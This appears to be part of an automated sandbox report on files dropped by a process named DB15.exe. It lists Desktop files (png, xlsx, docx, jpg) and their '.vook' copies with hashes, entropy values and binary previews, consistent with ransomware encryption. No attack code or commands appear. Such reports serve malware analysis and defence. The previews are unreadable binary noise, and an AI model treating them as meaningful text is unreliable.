                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.837225024756315
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:1NjmnmzWCGOhN2VGEW3WI98/SkJZo6WN6ez11FiNMfwXeIiTkbD:X91GnB3NfAN6+1iifdZiD
                                                                                                                                                                                                                                      MD5:BB6061F99DC401B925FFCD96D3CD0FD6
                                                                                                                                                                                                                                      SHA1:CF3AA4A09A5E6720BBDB97BFDA94F7435FB6C50A
                                                                                                                                                                                                                                      SHA-256:9790FD84567B7CCE07A7A12FF8884DAD26168C7A0FCCCA8B0D0FB2B195D1ED38
                                                                                                                                                                                                                                      SHA-512:4F12E0426FC5A65BF75E1B6E62F578B2F52AA96C886BA7D72E52DF36DD929F0B3B7AB96C1748F4F7476D170BE54E025580D8D3B43E2A52FB7FFCBB4B7534DA08
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA.{$-_.b.......bT..75...~y.zST.?e.d..h~3Y.[w...^*..xE..x...p..|....|..CK..2..8.;.2kk..Y"#..F.6..k.?.NX#Q.8m....n.3T~.h..^2jR.."....>U...p.-D@M.{...z.......z?....$..H.".....Q:.b:x.('.zV.+.40...<.;.<N..j0p..d..jh..s....F..&.A9.>I..Rf...+S..P,...R._..'.J%.a....:._Fp...u..........p..%...^..f../.y~.b&b.O...x.\...L.8.../ `4...;..L.=.............%.-.D.4.\..k47..I..H,.7.G.e$...y..%..88..U`......G..+.E.-'.B.......<I..._.oFK.O..o.>..!H.PZbv..(..e...5..E1...4d...n7.p...R=....(.iM%..5..z....5o..<>$..J......d)+.\dD...h8J.6.@:>...%.VM>......c.4,".B.....F.2.%..........v.3A..Y)..X..'..-..=G.....?..Y....../.......u....6.......e.H...A.*.....d...3.s..*:..O...T..6;..e...4........}... .9...9|..h...-...k.. ;.G.bG...y(.:".p.j..K.#..7...~2P...yb...Cq..!\.e;}|..*.....5..r..;......2..T.."....U..."g.BK.h...x,d..4...f..W!..N.gN..)B_.{!..Tf...p...EF...o.W..c.N...$.../.6.?.........$=T..eyY.....|...^..H.....`&....x.._...#..b.{..Sc....k.q+........G........u

                                                                                                                                                                                                                                      C:\Users\user\Desktop\UOOJJOZIRH\QNCYCDFIJJ.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.836003698317715
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:nySr3m5YnlsnBIgQ5RN0p4+HI/rj+MATwZPGFUoGZUnNUm/xc+HgTuiTkbD:ny4lRJNUKfxW5Gz86iD
                                                                                                                                                                                                                                      MD5:DE34F7C2D96171DBD675B9D8120EB3BA
                                                                                                                                                                                                                                      SHA1:F38AC4CD0FC4EFA13AD81C8B4B88B0FB5FB2E62A
                                                                                                                                                                                                                                      SHA-256:7A1B01F253FCC8A6E60E560AEF64F994D87C86654AB1EED12CACE158698FC1BE
                                                                                                                                                                                                                                      SHA-512:C6CE7208D7AF5C9D5051CE43DFBF11196786EFE23D78CB8C7E6A75943B4B61105120961B681024B74ADF947C2AD0B95FECE4C65CFECDECD5370BFC01D45F4A55
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:QNCYC\..%..'.."X.9...O.JL.A...,..RW.H..YR8..n.Rble.Y..`=#...mIE.>.I3..b.8.h..{|>._..n.v......9...`.v..=...F..+......~"..../PcI.{]....;..z...S..s.;,.*..... ../...*.;.....,...L.>.zC..8.9.~..!...[...Q..i|.p....x..aW-J..](......B~l76..np $....R...p.....G...i.D.Fp^g.$..HS..1.%*..Z.....0.[....nW._.e..ol6.:=..W...<...............f...Je.x.]/.M.S.....|......T L...)M.....%.T.ip..=V..Pn.......:B.wio....qY.i....HS.."y....+..U..D.....~..WW.3..Qn(...X..F......@.{p....SE-o%.7.:...>....|......%Z......r..x..R...OS..|...@Ng.+.Y..Rc.r]h......K.....gs..U`].X,A..g...n=.kF]sw.......A..;...._..'.0.`...ah].!..._T.f.j...!.....Y........bM..T.F.J..g.....TQ...c..BO..n..>..h.../6...>.]'#........-N=...3f.0.a]..C..n......f.D.Z.>B...{.....H.......@....B.1`.y..5,.m.|1}~.L...(.....jw8DK...^1.m.{M.2.*..i-i...e.x60...........W........X.Xn...GT/~.NW.n..B...(.z...-.E..l...mN....I..Ld<.v!E.......D(..M......U..G{.x..+..eX.....Oy~.....O.Mj.x........."$.t.S..O........1[jMG....k.e

                                                                                                                                                                                                                                      C:\Users\user\Desktop\UOOJJOZIRH\QNCYCDFIJJ.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.836003698317715
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:nySr3m5YnlsnBIgQ5RN0p4+HI/rj+MATwZPGFUoGZUnNUm/xc+HgTuiTkbD:ny4lRJNUKfxW5Gz86iD
                                                                                                                                                                                                                                      MD5:DE34F7C2D96171DBD675B9D8120EB3BA
                                                                                                                                                                                                                                      SHA1:F38AC4CD0FC4EFA13AD81C8B4B88B0FB5FB2E62A
                                                                                                                                                                                                                                      SHA-256:7A1B01F253FCC8A6E60E560AEF64F994D87C86654AB1EED12CACE158698FC1BE
                                                                                                                                                                                                                                      SHA-512:C6CE7208D7AF5C9D5051CE43DFBF11196786EFE23D78CB8C7E6A75943B4B61105120961B681024B74ADF947C2AD0B95FECE4C65CFECDECD5370BFC01D45F4A55
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:QNCYC\..%..'.."X.9...O.JL.A...,..RW.H..YR8..n.Rble.Y..`=#...mIE.>.I3..b.8.h..{|>._..n.v......9...`.v..=...F..+......~"..../PcI.{]....;..z...S..s.;,.*..... ../...*.;.....,...L.>.zC..8.9.~..!...[...Q..i|.p....x..aW-J..](......B~l76..np $....R...p.....G...i.D.Fp^g.$..HS..1.%*..Z.....0.[....nW._.e..ol6.:=..W...<...............f...Je.x.]/.M.S.....|......T L...)M.....%.T.ip..=V..Pn.......:B.wio....qY.i....HS.."y....+..U..D.....~..WW.3..Qn(...X..F......@.{p....SE-o%.7.:...>....|......%Z......r..x..R...OS..|...@Ng.+.Y..Rc.r]h......K.....gs..U`].X,A..g...n=.kF]sw.......A..;...._..'.0.`...ah].!..._T.f.j...!.....Y........bM..T.F.J..g.....TQ...c..BO..n..>..h.../6...>.]'#........-N=...3f.0.a]..C..n......f.D.Z.>B...{.....H.......@....B.1`.y..5,.m.|1}~.L...(.....jw8DK...^1.m.{M.2.*..i-i...e.x60...........W........X.Xn...GT/~.NW.n..B...(.z...-.E..l...mN....I..Ld<.v!E.......D(..M......U..G{.x..+..eX.....Oy~.....O.Mj.x........."$.t.S..O........1[jMG....k.e

                                                                                                                                                                                                                                      C:\Users\user\Desktop\UOOJJOZIRH\SFPUSAFIOL.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.843847823616394
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:/1Ud+B04MWwOkZWAESgKGENL3mg7j85D6wDC/nXhz9+31yxAghkyiTkbD:/1Ud+BFM9OyWnKn3mg0NF+/nCFym6GiD
                                                                                                                                                                                                                                      MD5:E3748D5EB3BF4FAB76A98E6749CD1C94
                                                                                                                                                                                                                                      SHA1:047DB9EA3184BAB872578FD322080EC202379523
                                                                                                                                                                                                                                      SHA-256:2D0AE581EC5609EFCBEC28A300B3366CCBD6928C2DB1A307173E7DD15D82D9FC
                                                                                                                                                                                                                                      SHA-512:1C9EF5E4C1543AD129CD12FBEE8E8788F17672E58418BD32464F4F34933F16AB2EC75E73D551B18BE77C1C35E0E57DB91AD2A36772D677261A7F1E619B00F21F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUSI./....8.b.C...v;...I.yN..2Y...Q...g.......36.oa8q.'u.p...$.?..$.......8+..GS..r..tu.0@m.CwHr.yO.PcmFuy.3.x_O&.....5...... ..$..Q.~.t....y4.fQ.|[...6..M.....(T.u..R{.5..J. .r(>..|&=.'....+...b....:..U#......8....."M.4.J......TC[&.O4G.{.:.C..4.|..wG..CfJ .'....~..5.Bx./..*rz..a.zV...&....yD&{I.<K...9..`..}.....t......M..D<.EB{R.D%..k.jE.....Y....1..........w..^.......3..yl.P:z.g..s...aJ.....i..>.D8f..K>.DI...*..J.....2..j...\..I.[.c._r.;6....<.Z...l...;..>ZO...._..1.$....._..P.(>.-P.\.m.?%.`...m..JJ2.......*W..*...[@....'*Z.t@.8|&../jt!....h........l...t|..O.*t..*A....-.z&......uC...AS....o#o....p#..m....ctq..".T.....d.+.|1........ *t...Rt..+.a..(..p)M;l...4k.....aj....@....G3..fd....M...R{^..O:}...;........4pX5c...qz.}..3.....&.z.XT....>s.i...FH...N.]'zl.......+.g\..tU.s.5iN..6...c.l.J}.=.sy....aUH..q.....w9..\.=.xk^..6r*........*.5.]....v?.%;6U..b...40......f...(|G.../.\.8.t..=...h.x.@r...m.K.........K.L.......q.YWM)...{....8....1.w+d..^P.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\UOOJJOZIRH\SFPUSAFIOL.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.843847823616394
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:/1Ud+B04MWwOkZWAESgKGENL3mg7j85D6wDC/nXhz9+31yxAghkyiTkbD:/1Ud+BFM9OyWnKn3mg0NF+/nCFym6GiD
                                                                                                                                                                                                                                      MD5:E3748D5EB3BF4FAB76A98E6749CD1C94
                                                                                                                                                                                                                                      SHA1:047DB9EA3184BAB872578FD322080EC202379523
                                                                                                                                                                                                                                      SHA-256:2D0AE581EC5609EFCBEC28A300B3366CCBD6928C2DB1A307173E7DD15D82D9FC
                                                                                                                                                                                                                                      SHA-512:1C9EF5E4C1543AD129CD12FBEE8E8788F17672E58418BD32464F4F34933F16AB2EC75E73D551B18BE77C1C35E0E57DB91AD2A36772D677261A7F1E619B00F21F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUSI./....8.b.C...v;...I.yN..2Y...Q...g.......36.oa8q.'u.p...$.?..$.......8+..GS..r..tu.0@m.CwHr.yO.PcmFuy.3.x_O&.....5...... ..$..Q.~.t....y4.fQ.|[...6..M.....(T.u..R{.5..J. .r(>..|&=.'....+...b....:..U#......8....."M.4.J......TC[&.O4G.{.:.C..4.|..wG..CfJ .'....~..5.Bx./..*rz..a.zV...&....yD&{I.<K...9..`..}.....t......M..D<.EB{R.D%..k.jE.....Y....1..........w..^.......3..yl.P:z.g..s...aJ.....i..>.D8f..K>.DI...*..J.....2..j...\..I.[.c._r.;6....<.Z...l...;..>ZO...._..1.$....._..P.(>.-P.\.m.?%.`...m..JJ2.......*W..*...[@....'*Z.t@.8|&../jt!....h........l...t|..O.*t..*A....-.z&......uC...AS....o#o....p#..m....ctq..".T.....d.+.|1........ *t...Rt..+.a..(..p)M;l...4k.....aj....@....G3..fd....M...R{^..O:}...;........4pX5c...qz.}..3.....&.z.XT....>s.i...FH...N.]'zl.......+.g\..tU.s.5iN..6...c.l.J}.=.sy....aUH..q.....w9..\.=.xk^..6r*........*.5.]....v?.%;6U..b...40......f...(|G.../.\.8.t..=...h.x.@r...m.K.........K.L.......q.YWM)...{....8....1.w+d..^P.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\UOOJJOZIRH\UOOJJOZIRH.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.852054284430425
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:m/3SR77UQCDLPjuFiXZSvsKj/0/WA5DqVfIkKoMSpfx2vZzZLD49pEOiTkbD:m/3SxUzoiXZS00Iq2kXMSVovffgCriD
                                                                                                                                                                                                                                      MD5:E694E2E4DEE2D10458B671B70100C1D2
                                                                                                                                                                                                                                      SHA1:3D4835566C483451829700FA6E1D3E6DD61A269C
                                                                                                                                                                                                                                      SHA-256:F07D6F8A0B11FD642553B8A34879DA94F49B95386220648C77676493461AC8A9
                                                                                                                                                                                                                                      SHA-512:36C5BB4478DB2FC9F02E5BAD028D63CFB06DD46712D8CD7BCBECA3F4AD8E22033710BFA69CEE76AAFFE67653F5B3826CE1470A256E933C7DCE6F3F9DF1BAC264
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:UOOJJ...7..WP..Q.v."F.0g^1..2p.~:..:lY...L.G;._....b.T.......:.E...h.. !.W..1]..B.W..LR....c..S...N:KhV[....|..|u.T.....A....I.x...xz....:.. .l~B....|;..%...M..wR......<..S..M......[S......p.b....fGR.3+..!..C8..Q.."}?...9K0.].*.....o.n.Od7[."...`.I....o......P(.819@....Qb5.8js..."L.w....?...B..c+z..L.....gzj..0...!..H....J.M).Z..fv..i.U.Q.s..%.#.nJ.,}.v......u.^..Mw..Kt.#.%.'.-.k.....O..{.8....x.9.uoZ.4+w.....P..lg.H.jrE.5.7o..m.j....2.g....."..l..K...|.".....kl.:.#.[`..Ai......L... .y.p.Q..p..Gr2......a.`...{]ik..R..mA.......4.`...j...V,..II.......$.|_...vq..+.|AO... ..P..\U.Y. .K...,..}...M.....fh.F.=..I.V.....G.f+..@p...S.5..... r.v\;...~{.i..hD..+B..'...$.;...0.o.d.aE,..^.jW~v...[y...1yu(aQ..5......S.;Y.uN...a3.0..n..Je..n.&Y.....'...!....2S.............=j..."s L1.i.."..-W.Z.......U..8.@..Tv...-.=....*..N*....z..<..y+-...........a..H..gS...L-...I"av.....3P...7.|..........\...E..U..p...T.;.B.`..>.|...Z.../....C\......D...wug.0.#m..'

                                                                                                                                                                                                                                      C:\Users\user\Desktop\UOOJJOZIRH\UOOJJOZIRH.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.852054284430425
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:m/3SR77UQCDLPjuFiXZSvsKj/0/WA5DqVfIkKoMSpfx2vZzZLD49pEOiTkbD:m/3SxUzoiXZS00Iq2kXMSVovffgCriD
                                                                                                                                                                                                                                      MD5:E694E2E4DEE2D10458B671B70100C1D2
                                                                                                                                                                                                                                      SHA1:3D4835566C483451829700FA6E1D3E6DD61A269C
                                                                                                                                                                                                                                      SHA-256:F07D6F8A0B11FD642553B8A34879DA94F49B95386220648C77676493461AC8A9
                                                                                                                                                                                                                                      SHA-512:36C5BB4478DB2FC9F02E5BAD028D63CFB06DD46712D8CD7BCBECA3F4AD8E22033710BFA69CEE76AAFFE67653F5B3826CE1470A256E933C7DCE6F3F9DF1BAC264
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:UOOJJ...7..WP..Q.v."F.0g^1..2p.~:..:lY...L.G;._....b.T.......:.E...h.. !.W..1]..B.W..LR....c..S...N:KhV[....|..|u.T.....A....I.x...xz....:.. .l~B....|;..%...M..wR......<..S..M......[S......p.b....fGR.3+..!..C8..Q.."}?...9K0.].*.....o.n.Od7[."...`.I....o......P(.819@....Qb5.8js..."L.w....?...B..c+z..L.....gzj..0...!..H....J.M).Z..fv..i.U.Q.s..%.#.nJ.,}.v......u.^..Mw..Kt.#.%.'.-.k.....O..{.8....x.9.uoZ.4+w.....P..lg.H.jrE.5.7o..m.j....2.g....."..l..K...|.".....kl.:.#.[`..Ai......L... .y.p.Q..p..Gr2......a.`...{]ik..R..mA.......4.`...j...V,..II.......$.|_...vq..+.|AO... ..P..\U.Y. .K...,..}...M.....fh.F.=..I.V.....G.f+..@p...S.5..... r.v\;...~{.i..hD..+B..'...$.;...0.o.d.aE,..^.jW~v...[y...1yu(aQ..5......S.;Y.uN...a3.0..n..Je..n.&Y.....'...!....2S.............=j..."s L1.i.."..-W.Z.......U..8.@..Tv...-.=....*..N*....z..<..y+-...........a..H..gS...L-...I"av.....3P...7.|..........\...E..U..p...T.;.B.`..>.|...Z.../....C\......D...wug.0.#m..'

                                                                                                                                                                                                                                      C:\Users\user\Desktop\UOOJJOZIRH\ZQIXMVQGAH.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.858363442175275
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:urGzxTfBkNEE9kEc/On19WEPdNNV8YEdbVbEMANVO8R6skaJGyX1OthuvQOTcOnn:CYTfBkN39Y/o19WCOYEdbVbNuOd2X1gO
                                                                                                                                                                                                                                      MD5:D80691F1F027EE8D8934A52671B753B5
                                                                                                                                                                                                                                      SHA1:B829B68D5E915D8ACD8A5BDC9EAF9FBA866E0E6D
                                                                                                                                                                                                                                      SHA-256:31BA6D4737BD01989E2488D769128A4423C1476295A68F3875148056DBBEFB93
                                                                                                                                                                                                                                      SHA-512:32901147EAE0E7870CE1462E00D2E9CD17F9C530352F826C6683C2E74C93EDF216E3FFE5F74D8D5976BD1DBC93A3BADA8B39494FAA05BF6D26FC2449169C9148
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:ZQIXM~...8.....vN..7.m......._9 ..k%....5......../pq....1.f..PP.-.`^.....lpC.yW....)d....Z...&...\.N;.-.....#.5..f.s.....k$..).Dv.I.}...".'9.>....L.l@p.$.R..).A.E(...(.QG.......O.sM..k$<...6.........J,./..P.wr.`.w?..P""...s..G...8Q..y.g.....].l.o.....C...R...............V;.p..ou..J......9....._.I....^p$....W.G...d&.T.c......X.%F....7.,`...p.2....]..<.....X..4.......!T...xb.m.@U.....q...........>.u.;....S.Y..X...(.\p......A.....$.....y....Sw",.M.W.._.i..x....x./..+y./>.|.....FX.p...!....-iO..,..H.z.../...n.........,.5...E{@.m...~.*......E..e.Y?d..!...k2.rJ.A.O.Rb....3w.!......WS..._}Bc1,.]X.mI..v>lH.5:.{.A/..0.........-\[K]p..)q.X.+e...N.8t....B...zk...M".Q.....u...O.O;C.5.n.8..5.O5]..T.....e.{...9/...#..7L.qw..#.8U...Rt..3E7./.Z...9.'.fx....Y....."..0...).c..r....M...^MW..........r..;..F..../....Jl..pwi.@.n...yg.B>L.`.-.P...Yec....l.dm..%..|..Xd .b.Rk....F.ck.i=P...a.0HU.!u..U..G.UL.B\.O...f........^6...{....,.M=/.'=....Nn.e4......I....M2.....H.?Ft.C

                                                                                                                                                                                                                                      C:\Users\user\Desktop\UOOJJOZIRH\ZQIXMVQGAH.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.858363442175275
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:urGzxTfBkNEE9kEc/On19WEPdNNV8YEdbVbEMANVO8R6skaJGyX1OthuvQOTcOnn:CYTfBkN39Y/o19WCOYEdbVbNuOd2X1gO
                                                                                                                                                                                                                                      MD5:D80691F1F027EE8D8934A52671B753B5
                                                                                                                                                                                                                                      SHA1:B829B68D5E915D8ACD8A5BDC9EAF9FBA866E0E6D
                                                                                                                                                                                                                                      SHA-256:31BA6D4737BD01989E2488D769128A4423C1476295A68F3875148056DBBEFB93
                                                                                                                                                                                                                                      SHA-512:32901147EAE0E7870CE1462E00D2E9CD17F9C530352F826C6683C2E74C93EDF216E3FFE5F74D8D5976BD1DBC93A3BADA8B39494FAA05BF6D26FC2449169C9148
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:ZQIXM~...8.....vN..7.m......._9 ..k%....5......../pq....1.f..PP.-.`^.....lpC.yW....)d....Z...&...\.N;.-.....#.5..f.s.....k$..).Dv.I.}...".'9.>....L.l@p.$.R..).A.E(...(.QG.......O.sM..k$<...6.........J,./..P.wr.`.w?..P""...s..G...8Q..y.g.....].l.o.....C...R...............V;.p..ou..J......9....._.I....^p$....W.G...d&.T.c......X.%F....7.,`...p.2....]..<.....X..4.......!T...xb.m.@U.....q...........>.u.;....S.Y..X...(.\p......A.....$.....y....Sw",.M.W.._.i..x....x./..+y./>.|.....FX.p...!....-iO..,..H.z.../...n.........,.5...E{@.m...~.*......E..e.Y?d..!...k2.rJ.A.O.Rb....3w.!......WS..._}Bc1,.]X.mI..v>lH.5:.{.A/..0.........-\[K]p..)q.X.+e...N.8t....B...zk...M".Q.....u...O.O;C.5.n.8..5.O5]..T.....e.{...9/...#..7L.qw..#.8U...Rt..3E7./.Z...9.'.fx....Y....."..0...).c..r....M...^MW..........r..;..F..../....Jl..pwi.@.n...yg.B>L.`.-.P...Yec....l.dm..%..|..Xd .b.Rk....F.ck.i=P...a.0HU.!u..U..G.UL.B\.O...f........^6...{....,.M=/.'=....Nn.e4......I....M2.....H.?Ft.C

                                                                                                                                                                                                                                      C:\Users\user\Desktop\ZQIXMVQGAH.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.814272080549682
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:R1v0M4t17DHR3i2duxR2SQ96PAmpJlPZBOlc+nrYC6QpMNV2fTpsbriTkbD:RX4t17DHR3i2dMsSQeAWXBUckYCtss9w
                                                                                                                                                                                                                                      MD5:690D4BC09407FF745DC730DB2F9D30D5
                                                                                                                                                                                                                                      SHA1:AE68735FE737E0276547AE927B7B74FBBEB79D45
                                                                                                                                                                                                                                      SHA-256:B81E237DFABD291D3273F8101578072724EFDC96453775E31BFD5783DE47FA41
                                                                                                                                                                                                                                      SHA-512:CFA48B352489D092C229C47012A1F0485FFD8CEC7C594ABFE8D086DFFEF436D59EA66F5367F17FE8BF38839055134B21CDC277C393CD5B03EAA980196F885E74
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:ZQIXM!4..C$_.,:....W..a.......GE....(..Eo...4[/.t.P.... .$..N.Tg....<..hjE..T...z]W...A....oJ...Z..;...(............/.`.....%...X..&.f_..../.....2.:..-..a.9.;.~.....B.P.xQl.4.q...Ei+...9.ti.%iL.X..=.9..y....3;..Q_..N...h.v.Y...o....v....P.S.f..k>9.v.....j.C.]..BB.J1..B.@........]"c.Bz.......x8.)j.[.+....b.."2i..f.6..k.,.H........L.A.K.*.j...F[.|...ZXMj..WD.t..y...n@.c.._w4P.w.k5.c..?H..xO./s.Z7.G.{nt>X:.....7.NSN.9D.4........C.U.p..L..|.3....b...3_...}.......'.9.Y..>..X.*.1'.x..8W.Mr.C....N......1.i'.O.#..di..!..h..-.}.......H(a....3.%....{/..............".....5........*f6I.L.W.b..9..mx...7.gp..1.K.......#L.!.nZ..8..@...<.o..U.m.........0....<...q..Hq..H..O.]^.7.zP..*..O ...4~.$(E..Q..]f+..R.-....].KC\]<R..~....8...T.M..\.$nZ.G[!P.....Rk....(.n.H.}A .2..3Y...q.]:..Tdc.....T!.Z.....O....[E..rPPJ.gV...T.s..y.H...c.`.<..\.R.s.....G....kPD..5..(P.=!..........!.[%...T}V$c...8.Ed)xC.%M...G........d...mS..91jB.8y...-..].1..]....8.D+b......0

                                                                                                                                                                                                                                      C:\Users\user\Desktop\ZQIXMVQGAH.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.814272080549682
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:R1v0M4t17DHR3i2duxR2SQ96PAmpJlPZBOlc+nrYC6QpMNV2fTpsbriTkbD:RX4t17DHR3i2dMsSQeAWXBUckYCtss9w
                                                                                                                                                                                                                                      MD5:690D4BC09407FF745DC730DB2F9D30D5
                                                                                                                                                                                                                                      SHA1:AE68735FE737E0276547AE927B7B74FBBEB79D45
                                                                                                                                                                                                                                      SHA-256:B81E237DFABD291D3273F8101578072724EFDC96453775E31BFD5783DE47FA41
                                                                                                                                                                                                                                      SHA-512:CFA48B352489D092C229C47012A1F0485FFD8CEC7C594ABFE8D086DFFEF436D59EA66F5367F17FE8BF38839055134B21CDC277C393CD5B03EAA980196F885E74
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:ZQIXM!4..C$_.,:....W..a.......GE....(..Eo...4[/.t.P.... .$..N.Tg....<..hjE..T...z]W...A....oJ...Z..;...(............/.`.....%...X..&.f_..../.....2.:..-..a.9.;.~.....B.P.xQl.4.q...Ei+...9.ti.%iL.X..=.9..y....3;..Q_..N...h.v.Y...o....v....P.S.f..k>9.v.....j.C.]..BB.J1..B.@........]"c.Bz.......x8.)j.[.+....b.."2i..f.6..k.,.H........L.A.K.*.j...F[.|...ZXMj..WD.t..y...n@.c.._w4P.w.k5.c..?H..xO./s.Z7.G.{nt>X:.....7.NSN.9D.4........C.U.p..L..|.3....b...3_...}.......'.9.Y..>..X.*.1'.x..8W.Mr.C....N......1.i'.O.#..di..!..h..-.}.......H(a....3.%....{/..............".....5........*f6I.L.W.b..9..mx...7.gp..1.K.......#L.!.nZ..8..@...<.o..U.m.........0....<...q..Hq..H..O.]^.7.zP..*..O ...4~.$(E..Q..]f+..R.-....].KC\]<R..~....8...T.M..\.$nZ.G[!P.....Rk....(.n.H.}A .2..3Y...q.]:..Tdc.....T!.Z.....O....[E..rPPJ.gV...T.s..y.H...c.`.<..\.R.s.....G....kPD..5..(P.=!..........!.[%...T}V$c...8.Ed)xC.%M...G........d...mS..91jB.8y...-..].1..]....8.D+b......0

                                                                                                                                                                                                                                      C:\Users\user\Desktop\ZQIXMVQGAH.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.851617862214594
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:1S0iI1vrAsJZzvLb/WgVbN2f1MfM+8vyiB1jKOTwadq6G3VHBA3HiiTkbD:o0ZzHX/VVGSEjaqfQVHBaHXiD
                                                                                                                                                                                                                                      MD5:2A959354C4FEE82FDBD9AD38DC19DF3B
                                                                                                                                                                                                                                      SHA1:16E67F9CFCEA41AF1AD1E62F1EB5F678F104EF96
                                                                                                                                                                                                                                      SHA-256:D8561F3BAB40A4BAD1CF5FE7352B44651A5EDFD2FF8D8143F4ABB6DF7560EF0E
                                                                                                                                                                                                                                      SHA-512:A25B2BB1D77DB612C8A78DF3654D04A1D4E04CB5B71AB0DB000E2A165ED0EC24D452CEE71C30D76AB297BB1F59D3070F711C879275EE38C51A33088717CB41C9
                                                                                                                                                                                                                                      Malicious:false
